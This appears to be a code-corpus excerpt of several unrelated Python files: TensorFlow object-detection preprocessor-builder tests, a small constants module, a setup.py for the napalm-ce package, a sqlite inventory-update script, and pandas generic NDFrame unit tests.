preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Parse(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_jpeg_quality)
self.assert_dictionary_close(args, {'random_coef': 0.5,
'min_jpeg_quality': 40,
'max_jpeg_quality': 90})
def test_build_random_downscale_to_target_pixels(self):
preprocessor_text_proto = """
random_downscale_to_target_pixels {
random_coef: 0.5
min_target_pixels: 200
max_target_pixels: 900
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Parse(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_downscale_to_target_pixels)
self.assert_dictionary_close(args, {
'random_coef': 0.5,
'min_target_pixels': 200,
'max_target_pixels': 900
})
def test_build_random_patch_gaussian(self):
preprocessor_text_proto = """
random_patch_gaussian {
random_coef: 0.5
min_patch_size: 10
max_patch_size: 300
min_gaussian_stddev: 0.2
max_gaussian_stddev: 1.5
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Parse(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_patch_gaussian)
self.assert_dictionary_close(args, {
'random_coef': 0.5,
'min_patch_size': 10,
'max_patch_size': 300,
'min_gaussian_stddev': 0.2,
'max_gaussian_stddev': 1.5
})
def test_auto_augment_image(self):
preprocessor_text_proto = """
autoaugment_image {
policy_name: 'v0'
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.autoaugment_image)
self.assert_dictionary_close(args, {'policy_name': 'v0'})
def test_drop_label_probabilistically(self):
preprocessor_text_proto = """
drop_label_probabilistically{
label: 2
drop_probability: 0.5
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.drop_label_probabilistically)
self.assert_dictionary_close(args, {
'dropped_label': 2,
'drop_probability': 0.5
})
def test_remap_labels(self):
preprocessor_text_proto = """
remap_labels{
original_labels: 1
original_labels: 2
new_label: 3
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.remap_labels)
self.assert_dictionary_close(args, {
'original_labels': [1, 2],
'new_label': 3
})
def test_build_random_resize_method(self):
preprocessor_text_proto = """
random_resize_method {
target_height: 75
target_width: 100
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_resize_method)
self.assert_dictionary_close(args, {'target_size': [75, 100]})
def test_build_scale_boxes_to_pixel_coordinates(self):
preprocessor_text_proto = """
scale_boxes_to_pixel_coordinates {}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.scale_boxes_to_pixel_coordinates)
self.assertEqual(args, {})
def test_build_resize_image(self):
preprocessor_text_proto = """
resize_image {
new_height: 75
new_width: 100
method: BICUBIC
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.resize_image)
self.assertEqual(args, {'new_height': 75,
'new_width': 100,
'method': tf.image.ResizeMethod.BICUBIC})
def test_build_rgb_to_gray(self):
preprocessor_text_proto = """
rgb_to_gray {}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.rgb_to_gray)
self.assertEqual(args, {})
def test_build_subtract_channel_mean(self):
preprocessor_text_proto = """
subtract_channel_mean {
means: [1.0, 2.0, 3.0]
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.subtract_channel_mean)
self.assertEqual(args, {'means': [1.0, 2.0, 3.0]})
def test_random_self_concat_image(self):
preprocessor_text_proto = """
random_self_concat_image {
concat_vertical_probability: 0.5
concat_horizontal_probability: 0.25
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_self_concat_image)
self.assertEqual(args, {'concat_vertical_probability': 0.5,
'concat_horizontal_probability': 0.25})
def test_build_ssd_random_crop(self):
preprocessor_text_proto = """
ssd_random_crop {
operations {
min_object_covered: 0.0
min_aspect_ratio: 0.875
max_aspect_ratio: 1.125
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.0
clip_boxes: False
random_coef: 0.375
}
operations {
min_object_covered: 0.25
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.25
clip_boxes: True
random_coef: 0.375
}
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.ssd_random_crop)
self.assertEqual(args, {'min_object_covered': [0.0, 0.25],
'aspect_ratio_range': [(0.875, 1.125), (0.75, 1.5)],
'area_range': [(0.5, 1.0), (0.5, 1.0)],
'overlap_thresh': [0.0, 0.25],
'clip_boxes': [False, True],
'random_coef': [0.375, 0.375]})
def test_build_ssd_random_crop_empty_operations(self):
preprocessor_text_proto = """
ssd_random_crop {
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.ssd_random_crop)
self.assertEqual(args, {})
def test_build_ssd_random_crop_pad(self):
preprocessor_text_proto = """
ssd_random_crop_pad {
operations {
min_object_covered: 0.0
min_aspect_ratio: 0.875
max_aspect_ratio: 1.125
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.0
clip_boxes: False
random_coef: 0.375
min_padded_size_ratio: [1.0, 1.0]
max_padded_size_ratio: [2.0, 2.0]
pad_color_r: 0.5
pad_color_g: 0.5
pad_color_b: 0.5
}
operations {
min_object_covered: 0.25
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.25
clip_boxes: True
random_coef: 0.375
min_padded_size_ratio: [1.0, 1.0]
max_padded_size_ratio: [2.0, 2.0]
pad_color_r: 0.5
pad_color_g: 0.5
pad_color_b: 0.5
}
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.ssd_random_crop_pad)
self.assertEqual(args, {'min_object_covered': [0.0, 0.25],
'aspect_ratio_range': [(0.875, 1.125), (0.75, 1.5)],
'area_range': [(0.5, 1.0), (0.5, 1.0)],
'overlap_thresh': [0.0, 0.25],
'clip_boxes': [False, True],
'random_coef': [0.375, 0.375],
'min_padded_size_ratio': [(1.0, 1.0), (1.0, 1.0)],
'max_padded_size_ratio': [(2.0, 2.0), (2.0, 2.0)],
'pad_color': [(0.5, 0.5, 0.5), (0.5, 0.5, 0.5)]})
def test_build_ssd_random_crop_fixed_aspect_ratio(self):
preprocessor_text_proto = """
ssd_random_crop_fixed_aspect_ratio {
operations {
min_object_covered: 0.0
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.0
clip_boxes: False
random_coef: 0.375
}
operations {
min_object_covered: 0.25
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.25
clip_boxes: True
random_coef: 0.375
}
aspect_ratio: 0.875
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.ssd_random_crop_fixed_aspect_ratio)
self.assertEqual(args, {'min_object_covered': [0.0, 0.25],
'aspect_ratio': 0.875,
'area_range': [(0.5, 1.0), (0.5, 1.0)],
'overlap_thresh': [0.0, 0.25],
'clip_boxes': [False, True],
'random_coef': [0.375, 0.375]})
def test_build_ssd_random_crop_pad_fixed_aspect_ratio(self):
preprocessor_text_proto = """
ssd_random_crop_pad_fixed_aspect_ratio {
operations {
min_object_covered: 0.0
min_aspect_ratio: 0.875
max_aspect_ratio: 1.125
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.0
clip_boxes: False
random_coef: 0.375
}
operations {
min_object_covered: 0.25
min_aspect_ratio: 0.75
max_aspect_ratio: 1.5
min_area: 0.5
max_area: 1.0
overlap_thresh: 0.25
clip_boxes: True
random_coef: 0.375
}
aspect_ratio: 0.875
min_padded_size_ratio: [1.0, 1.0]
max_padded_size_ratio: [2.0, 2.0]
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function,
preprocessor.ssd_random_crop_pad_fixed_aspect_ratio)
self.assertEqual(args, {'min_object_covered': [0.0, 0.25],
'aspect_ratio': 0.875,
'aspect_ratio_range': [(0.875, 1.125), (0.75, 1.5)],
'area_range': [(0.5, 1.0), (0.5, 1.0)],
'overlap_thresh': [0.0, 0.25],
'clip_boxes': [False, True],
'random_coef': [0.375, 0.375],
'min_padded_size_ratio': (1.0, 1.0),
'max_padded_size_ratio': (2.0, 2.0)})
def test_build_normalize_image_convert_class_logits_to_softmax(self):
preprocessor_text_proto = """
convert_class_logits_to_softmax {
temperature: 2
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.convert_class_logits_to_softmax)
self.assertEqual(args, {'temperature': 2})
def test_random_crop_by_scale(self):
preprocessor_text_proto = """
random_square_crop_by_scale {
scale_min: 0.25
scale_max: 2.0
num_scales: 8
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_square_crop_by_scale)
self.assertEqual(args, {
'scale_min': 0.25,
'scale_max': 2.0,
'num_scales': 8,
'max_border': 128
})
def test_adjust_gamma(self):
preprocessor_text_proto = """
adjust_gamma {
gamma: 2.2
gain: 2.0
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Parse(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.adjust_gamma)
self.assert_dictionary_close(args, {'gamma': 2.2, 'gain': 2.0})
if __name__ == '__main__':
tf.test.main()
|
py | 1a4a08b22bfc4738c5fe3fadf65ff21ddb2e3fea | DEFAULT_INTERVAL_MS = 20 # 50 fps
DEFAULT_FIELDER_HEIGHT = 2 # meters
DEFAULT_BALLS_IN_PLAY = 100
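# presumably the field radius in meters (255 ft divided by 3.28 ft per meter)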
FIELD_RADIUS = 255 / 3.28
|
py | 1a4a08da9605589d5da7e2d9b23bae6d9f5eb39a | """setup.py file."""
import uuid
from setuptools import setup, find_packages
try: # for pip >= 10
from pip._internal.req import parse_requirements
except ImportError: # for pip <= 9.0.3
from pip.req import parse_requirements
__author__ = 'Hao Tang <[email protected]>'
install_reqs = parse_requirements('requirements.txt', session=uuid.uuid1())
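# newer pip versions expose the parsed requirement string as .requirement; older versions used .req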
try:
reqs = [str(ir.req) for ir in install_reqs]
except AttributeError:
reqs = [str(ir.requirement) for ir in install_reqs]
setup(
name="napalm-ce",
version="0.1.1",
packages=find_packages(),
author="Hao Tang",
author_email="[email protected]",
description="Network Automation and Programmability Abstraction Layer with Multivendor support",
classifiers=[
'Topic :: Utilities',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS',
],
url="https://github.com/napalm-automation-community/napalm-ce",
include_package_data=True,
install_requires=reqs,
)
|
py | 1a4a0b13e9d47fb32a8c42be70b373ef8a1d7c56 | # hw_02_sql.py
# import sqlite3 library
import sqlite3
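# using the connection as a context manager commits on success and rolls back on error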
with sqlite3.connect('car.db') as connection:
cursor = connection.cursor()
cursor.execute("UPDATE inventory SET quantity=6 WHERE make='Ford' and model='2016'")
cursor.execute("UPDATE inventory SET quantity=4 WHERE make='Honda' and model='2012'")
print("NEW DATA:\n\n")
cursor.execute("SELECT * from inventory")
for row in cursor.fetchall():
print(row[0], row[1], row[2])
|
py | 1a4a0b1678aa46b81afa456207d1f099e66ff786 | from copy import copy, deepcopy
import numpy as np
import pytest
from pandas.compat.numpy import _np_version_under1p17
from pandas.core.dtypes.common import is_scalar
import pandas as pd
from pandas import DataFrame, MultiIndex, Series, date_range
import pandas._testing as tm
import pandas.core.common as com
# ----------------------------------------------------------------------
# Generic types test cases
class Generic:
@property
def _ndim(self):
return self._typ._AXIS_LEN
def _axes(self):
""" return the axes for my object typ """
return self._typ._AXIS_ORDERS
def _construct(self, shape, value=None, dtype=None, **kwargs):
"""
        construct an object for the given shape
        if value is specified, use it as the fill value when it is a scalar;
        if value is an array, repeat it as needed
"""
if isinstance(shape, int):
shape = tuple([shape] * self._ndim)
if value is not None:
if is_scalar(value):
if value == "empty":
arr = None
dtype = np.float64
# remove the info axis
kwargs.pop(self._typ._info_axis_name, None)
else:
arr = np.empty(shape, dtype=dtype)
arr.fill(value)
else:
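                # repeat the provided values until they fill the requested shape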
fshape = np.prod(shape)
arr = value.ravel()
new_shape = fshape / arr.shape[0]
if fshape % arr.shape[0] != 0:
raise Exception("invalid value passed in _construct")
arr = np.repeat(arr, new_shape).reshape(shape)
else:
arr = np.random.randn(*shape)
return self._typ(arr, dtype=dtype, **kwargs)
def _compare(self, result, expected):
self._comparator(result, expected)
def test_rename(self):
# single axis
idx = list("ABCD")
# relabeling values passed into self.rename
args = [
str.lower,
{x: x.lower() for x in idx},
Series({x: x.lower() for x in idx}),
]
for axis in self._axes():
kwargs = {axis: idx}
obj = self._construct(4, **kwargs)
for arg in args:
# rename a single axis
result = obj.rename(**{axis: arg})
expected = obj.copy()
setattr(expected, axis, list("abcd"))
self._compare(result, expected)
# multiple axes at once
def test_get_numeric_data(self):
n = 4
kwargs = {self._typ._AXIS_NAMES[i]: list(range(n)) for i in range(self._ndim)}
# get the numeric data
o = self._construct(n, **kwargs)
result = o._get_numeric_data()
self._compare(result, o)
# non-inclusion
result = o._get_bool_data()
expected = self._construct(n, value="empty", **kwargs)
self._compare(result, expected)
# get the bool data
arr = np.array([True, True, False, True])
o = self._construct(n, value=arr, **kwargs)
result = o._get_numeric_data()
self._compare(result, o)
        # _get_numeric_data includes _get_bool_data, so can't test for
# non-inclusion
def test_nonzero(self):
# GH 4633
# look at the boolean/nonzero behavior for objects
obj = self._construct(shape=4)
msg = f"The truth value of a {self._typ.__name__} is ambiguous"
with pytest.raises(ValueError, match=msg):
bool(obj == 0)
with pytest.raises(ValueError, match=msg):
bool(obj == 1)
with pytest.raises(ValueError, match=msg):
bool(obj)
obj = self._construct(shape=4, value=1)
with pytest.raises(ValueError, match=msg):
bool(obj == 0)
with pytest.raises(ValueError, match=msg):
bool(obj == 1)
with pytest.raises(ValueError, match=msg):
bool(obj)
obj = self._construct(shape=4, value=np.nan)
with pytest.raises(ValueError, match=msg):
bool(obj == 0)
with pytest.raises(ValueError, match=msg):
bool(obj == 1)
with pytest.raises(ValueError, match=msg):
bool(obj)
# empty
obj = self._construct(shape=0)
with pytest.raises(ValueError, match=msg):
bool(obj)
# invalid behaviors
obj1 = self._construct(shape=4, value=1)
obj2 = self._construct(shape=4, value=1)
with pytest.raises(ValueError, match=msg):
if obj1:
pass
with pytest.raises(ValueError, match=msg):
obj1 and obj2
with pytest.raises(ValueError, match=msg):
obj1 or obj2
with pytest.raises(ValueError, match=msg):
not obj1
def test_downcast(self):
# test close downcasting
o = self._construct(shape=4, value=9, dtype=np.int64)
result = o.copy()
result._data = o._data.downcast()
self._compare(result, o)
o = self._construct(shape=4, value=9.5)
result = o.copy()
result._data = o._data.downcast()
self._compare(result, o)
def test_constructor_compound_dtypes(self):
# see gh-5191
# Compound dtypes should raise NotImplementedError.
def f(dtype):
return self._construct(shape=3, value=1, dtype=dtype)
msg = (
"compound dtypes are not implemented "
f"in the {self._typ.__name__} constructor"
)
with pytest.raises(NotImplementedError, match=msg):
f([("A", "datetime64[h]"), ("B", "str"), ("C", "int32")])
# these work (though results may be unexpected)
f("int64")
f("float64")
f("M8[ns]")
def check_metadata(self, x, y=None):
for m in x._metadata:
v = getattr(x, m, None)
if y is None:
assert v is None
else:
assert v == getattr(y, m, None)
def test_metadata_propagation(self):
# check that the metadata matches up on the resulting ops
o = self._construct(shape=3)
o.name = "foo"
o2 = self._construct(shape=3)
o2.name = "bar"
# ----------
# preserving
# ----------
# simple ops with scalars
for op in ["__add__", "__sub__", "__truediv__", "__mul__"]:
result = getattr(o, op)(1)
self.check_metadata(o, result)
# ops with like
for op in ["__add__", "__sub__", "__truediv__", "__mul__"]:
result = getattr(o, op)(o)
self.check_metadata(o, result)
# simple boolean
for op in ["__eq__", "__le__", "__ge__"]:
v1 = getattr(o, op)(o)
self.check_metadata(o, v1)
self.check_metadata(o, v1 & v1)
self.check_metadata(o, v1 | v1)
# combine_first
result = o.combine_first(o2)
self.check_metadata(o, result)
# ---------------------------
# non-preserving (by default)
# ---------------------------
# add non-like
result = o + o2
self.check_metadata(result)
# simple boolean
for op in ["__eq__", "__le__", "__ge__"]:
# this is a name matching op
v1 = getattr(o, op)(o)
v2 = getattr(o, op)(o2)
self.check_metadata(v2)
self.check_metadata(v1 & v2)
self.check_metadata(v1 | v2)
def test_head_tail(self, indices):
# GH5370
o = self._construct(shape=len(indices))
axis = o._get_axis_name(0)
setattr(o, axis, indices)
o.head()
self._compare(o.head(), o.iloc[:5])
self._compare(o.tail(), o.iloc[-5:])
# 0-len
self._compare(o.head(0), o.iloc[0:0])
self._compare(o.tail(0), o.iloc[0:0])
# bounded
self._compare(o.head(len(o) + 1), o)
self._compare(o.tail(len(o) + 1), o)
# neg index
self._compare(o.head(-3), o.head(len(indices) - 3))
self._compare(o.tail(-3), o.tail(len(indices) - 3))
def test_sample(self):
# Fixes issue: 2419
o = self._construct(shape=10)
###
# Check behavior of random_state argument
###
# Check for stability when receives seed or random state -- run 10
# times.
for test in range(10):
seed = np.random.randint(0, 100)
self._compare(
o.sample(n=4, random_state=seed), o.sample(n=4, random_state=seed)
)
self._compare(
o.sample(frac=0.7, random_state=seed),
o.sample(frac=0.7, random_state=seed),
)
self._compare(
o.sample(n=4, random_state=np.random.RandomState(test)),
o.sample(n=4, random_state=np.random.RandomState(test)),
)
self._compare(
o.sample(frac=0.7, random_state=np.random.RandomState(test)),
o.sample(frac=0.7, random_state=np.random.RandomState(test)),
)
self._compare(
o.sample(
frac=2, replace=True, random_state=np.random.RandomState(test)
),
o.sample(
frac=2, replace=True, random_state=np.random.RandomState(test)
),
)
os1, os2 = [], []
for _ in range(2):
np.random.seed(test)
os1.append(o.sample(n=4))
os2.append(o.sample(frac=0.7))
self._compare(*os1)
self._compare(*os2)
# Check for error when random_state argument invalid.
with pytest.raises(ValueError):
o.sample(random_state="astring!")
###
# Check behavior of `frac` and `N`
###
# Giving both frac and N throws error
with pytest.raises(ValueError):
o.sample(n=3, frac=0.3)
# Check that raises right error for negative lengths
with pytest.raises(ValueError):
o.sample(n=-3)
with pytest.raises(ValueError):
o.sample(frac=-0.3)
# Make sure float values of `n` give error
with pytest.raises(ValueError):
o.sample(n=3.2)
# Check lengths are right
        assert len(o.sample(n=4)) == 4
        assert len(o.sample(frac=0.34)) == 3
        assert len(o.sample(frac=0.36)) == 4
###
# Check weights
###
# Weight length must be right
with pytest.raises(ValueError):
o.sample(n=3, weights=[0, 1])
with pytest.raises(ValueError):
bad_weights = [0.5] * 11
o.sample(n=3, weights=bad_weights)
with pytest.raises(ValueError):
bad_weight_series = Series([0, 0, 0.2])
o.sample(n=4, weights=bad_weight_series)
# Check won't accept negative weights
with pytest.raises(ValueError):
bad_weights = [-0.1] * 10
o.sample(n=3, weights=bad_weights)
# Check inf and -inf throw errors:
with pytest.raises(ValueError):
weights_with_inf = [0.1] * 10
weights_with_inf[0] = np.inf
o.sample(n=3, weights=weights_with_inf)
with pytest.raises(ValueError):
weights_with_ninf = [0.1] * 10
weights_with_ninf[0] = -np.inf
o.sample(n=3, weights=weights_with_ninf)
# All zeros raises errors
zero_weights = [0] * 10
with pytest.raises(ValueError):
o.sample(n=3, weights=zero_weights)
# All missing weights
nan_weights = [np.nan] * 10
with pytest.raises(ValueError):
o.sample(n=3, weights=nan_weights)
# Check np.nan are replaced by zeros.
weights_with_nan = [np.nan] * 10
weights_with_nan[5] = 0.5
self._compare(o.sample(n=1, axis=0, weights=weights_with_nan), o.iloc[5:6])
# Check None are also replaced by zeros.
weights_with_None = [None] * 10
weights_with_None[5] = 0.5
self._compare(o.sample(n=1, axis=0, weights=weights_with_None), o.iloc[5:6])
def test_sample_upsampling_without_replacement(self):
# GH27451
df = pd.DataFrame({"A": list("abc")})
msg = (
"Replace has to be set to `True` when "
"upsampling the population `frac` > 1."
)
with pytest.raises(ValueError, match=msg):
df.sample(frac=2, replace=False)
def test_sample_is_copy(self):
# GH-27357, GH-30784: ensure the result of sample is an actual copy and
# doesn't track the parent dataframe / doesn't give SettingWithCopy warnings
df = pd.DataFrame(np.random.randn(10, 3), columns=["a", "b", "c"])
df2 = df.sample(3)
with tm.assert_produces_warning(None):
df2["d"] = 1
def test_size_compat(self):
# GH8846
# size property should be defined
o = self._construct(shape=10)
assert o.size == np.prod(o.shape)
assert o.size == 10 ** len(o.axes)
def test_split_compat(self):
# xref GH8846
o = self._construct(shape=10)
assert len(np.array_split(o, 5)) == 5
assert len(np.array_split(o, 2)) == 2
# See gh-12301
def test_stat_unexpected_keyword(self):
obj = self._construct(5)
starwars = "Star Wars"
errmsg = "unexpected keyword"
with pytest.raises(TypeError, match=errmsg):
obj.max(epic=starwars) # stat_function
with pytest.raises(TypeError, match=errmsg):
obj.var(epic=starwars) # stat_function_ddof
with pytest.raises(TypeError, match=errmsg):
obj.sum(epic=starwars) # cum_function
with pytest.raises(TypeError, match=errmsg):
obj.any(epic=starwars) # logical_function
@pytest.mark.parametrize("func", ["sum", "cumsum", "any", "var"])
def test_api_compat(self, func):
# GH 12021
# compat for __name__, __qualname__
obj = self._construct(5)
f = getattr(obj, func)
assert f.__name__ == func
assert f.__qualname__.endswith(func)
def test_stat_non_defaults_args(self):
obj = self._construct(5)
out = np.array([0])
errmsg = "the 'out' parameter is not supported"
with pytest.raises(ValueError, match=errmsg):
obj.max(out=out) # stat_function
with pytest.raises(ValueError, match=errmsg):
obj.var(out=out) # stat_function_ddof
with pytest.raises(ValueError, match=errmsg):
obj.sum(out=out) # cum_function
with pytest.raises(ValueError, match=errmsg):
obj.any(out=out) # logical_function
def test_truncate_out_of_bounds(self):
# GH11382
# small
shape = [int(2e3)] + ([1] * (self._ndim - 1))
small = self._construct(shape, dtype="int8", value=1)
self._compare(small.truncate(), small)
self._compare(small.truncate(before=0, after=3e3), small)
self._compare(small.truncate(before=-1, after=2e3), small)
# big
shape = [int(2e6)] + ([1] * (self._ndim - 1))
big = self._construct(shape, dtype="int8", value=1)
self._compare(big.truncate(), big)
self._compare(big.truncate(before=0, after=3e6), big)
self._compare(big.truncate(before=-1, after=2e6), big)
@pytest.mark.parametrize(
"func",
[copy, deepcopy, lambda x: x.copy(deep=False), lambda x: x.copy(deep=True)],
)
@pytest.mark.parametrize("shape", [0, 1, 2])
def test_copy_and_deepcopy(self, shape, func):
# GH 15444
obj = self._construct(shape)
obj_copy = func(obj)
assert obj_copy is not obj
self._compare(obj_copy, obj)
@pytest.mark.parametrize(
"periods,fill_method,limit,exp",
[
(1, "ffill", None, [np.nan, np.nan, np.nan, 1, 1, 1.5, 0, 0]),
(1, "ffill", 1, [np.nan, np.nan, np.nan, 1, 1, 1.5, 0, np.nan]),
(1, "bfill", None, [np.nan, 0, 0, 1, 1, 1.5, np.nan, np.nan]),
(1, "bfill", 1, [np.nan, np.nan, 0, 1, 1, 1.5, np.nan, np.nan]),
(-1, "ffill", None, [np.nan, np.nan, -0.5, -0.5, -0.6, 0, 0, np.nan]),
(-1, "ffill", 1, [np.nan, np.nan, -0.5, -0.5, -0.6, 0, np.nan, np.nan]),
(-1, "bfill", None, [0, 0, -0.5, -0.5, -0.6, np.nan, np.nan, np.nan]),
(-1, "bfill", 1, [np.nan, 0, -0.5, -0.5, -0.6, np.nan, np.nan, np.nan]),
],
)
def test_pct_change(self, periods, fill_method, limit, exp):
vals = [np.nan, np.nan, 1, 2, 4, 10, np.nan, np.nan]
obj = self._typ(vals)
func = getattr(obj, "pct_change")
res = func(periods=periods, fill_method=fill_method, limit=limit)
if type(obj) is DataFrame:
tm.assert_frame_equal(res, DataFrame(exp))
else:
tm.assert_series_equal(res, Series(exp))
class TestNDFrame:
# tests that don't fit elsewhere
    def test_sample(self):
# Fixes issue: 2419
# additional specific object based tests
# A few dataframe test with degenerate weights.
easy_weight_list = [0] * 10
easy_weight_list[5] = 1
df = pd.DataFrame(
{
"col1": range(10, 20),
"col2": range(20, 30),
"colString": ["a"] * 10,
"easyweights": easy_weight_list,
}
)
sample1 = df.sample(n=1, weights="easyweights")
tm.assert_frame_equal(sample1, df.iloc[5:6])
# Ensure proper error if string given as weight for Series or
# DataFrame with axis = 1.
s = Series(range(10))
with pytest.raises(ValueError):
s.sample(n=3, weights="weight_column")
with pytest.raises(ValueError):
df.sample(n=1, weights="weight_column", axis=1)
# Check weighting key error
with pytest.raises(
KeyError, match="'String passed to weights not a valid column'"
):
df.sample(n=3, weights="not_a_real_column_name")
# Check that re-normalizes weights that don't sum to one.
weights_less_than_1 = [0] * 10
weights_less_than_1[0] = 0.5
tm.assert_frame_equal(df.sample(n=1, weights=weights_less_than_1), df.iloc[:1])
###
# Test axis argument
###
# Test axis argument
df = pd.DataFrame({"col1": range(10), "col2": ["a"] * 10})
second_column_weight = [0, 1]
tm.assert_frame_equal(
df.sample(n=1, axis=1, weights=second_column_weight), df[["col2"]]
)
# Different axis arg types
tm.assert_frame_equal(
df.sample(n=1, axis="columns", weights=second_column_weight), df[["col2"]]
)
weight = [0] * 10
weight[5] = 0.5
tm.assert_frame_equal(df.sample(n=1, axis="rows", weights=weight), df.iloc[5:6])
tm.assert_frame_equal(
df.sample(n=1, axis="index", weights=weight), df.iloc[5:6]
)
# Check out of range axis values
with pytest.raises(ValueError):
df.sample(n=1, axis=2)
with pytest.raises(ValueError):
df.sample(n=1, axis="not_a_name")
with pytest.raises(ValueError):
s = pd.Series(range(10))
s.sample(n=1, axis=1)
# Test weight length compared to correct axis
with pytest.raises(ValueError):
df.sample(n=1, axis=1, weights=[0.5] * 10)
# Check weights with axis = 1
easy_weight_list = [0] * 3
easy_weight_list[2] = 1
df = pd.DataFrame(
{"col1": range(10, 20), "col2": range(20, 30), "colString": ["a"] * 10}
)
sample1 = df.sample(n=1, axis=1, weights=easy_weight_list)
tm.assert_frame_equal(sample1, df[["colString"]])
# Test default axes
tm.assert_frame_equal(
df.sample(n=3, random_state=42), df.sample(n=3, axis=0, random_state=42)
)
# Test that function aligns weights with frame
df = DataFrame({"col1": [5, 6, 7], "col2": ["a", "b", "c"]}, index=[9, 5, 3])
s = Series([1, 0, 0], index=[3, 5, 9])
tm.assert_frame_equal(df.loc[[3]], df.sample(1, weights=s))
# Weights have index values to be dropped because not in
# sampled DataFrame
s2 = Series([0.001, 0, 10000], index=[3, 5, 10])
tm.assert_frame_equal(df.loc[[3]], df.sample(1, weights=s2))
        # Weights have missing values to be filled with zeros
s3 = Series([0.01, 0], index=[3, 5])
tm.assert_frame_equal(df.loc[[3]], df.sample(1, weights=s3))
# No overlap in weight and sampled DataFrame indices
s4 = Series([1, 0], index=[1, 2])
with pytest.raises(ValueError):
df.sample(1, weights=s4)
@pytest.mark.parametrize(
"func_str,arg",
[
("np.array", [2, 3, 1, 0]),
pytest.param(
"np.random.MT19937",
3,
marks=pytest.mark.skipif(_np_version_under1p17, reason="NumPy<1.17"),
),
pytest.param(
"np.random.PCG64",
11,
marks=pytest.mark.skipif(_np_version_under1p17, reason="NumPy<1.17"),
),
],
)
def test_sample_random_state(self, func_str, arg):
# GH32503
df = pd.DataFrame({"col1": range(10, 20), "col2": range(20, 30)})
result = df.sample(n=3, random_state=eval(func_str)(arg))
expected = df.sample(n=3, random_state=com.random_state(eval(func_str)(arg)))
tm.assert_frame_equal(result, expected)
def test_squeeze(self):
# noop
for s in [tm.makeFloatSeries(), tm.makeStringSeries(), tm.makeObjectSeries()]:
tm.assert_series_equal(s.squeeze(), s)
for df in [tm.makeTimeDataFrame()]:
tm.assert_frame_equal(df.squeeze(), df)
# squeezing
df = tm.makeTimeDataFrame().reindex(columns=["A"])
